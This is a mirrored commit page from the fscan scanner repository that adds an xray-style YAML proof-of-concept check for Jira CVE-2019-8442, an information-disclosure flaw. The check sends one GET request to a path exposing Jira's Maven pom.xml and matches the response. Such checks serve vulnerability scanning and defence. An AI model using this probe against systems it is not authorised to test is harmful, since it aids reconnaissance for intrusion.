mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,11 @@
|
||||
name: poc-yaml-jira-cve-2019-8442
|
||||
rules:
|
||||
- method: GET
|
||||
path: "/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes(string(b"<groupId>com.atlassian.jira</groupId>"))) && response.content_type.contains("application/xml")
|
||||
detail:
|
||||
author: pa55w0rd(www.pa55w0rd.online/)
|
||||
Affected Version: "<7.13.4, 8.00-8.0.4, 8.1.0-8.1.1"
|
||||
links:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-8442
|
||||
Reference in New Issue
Block a user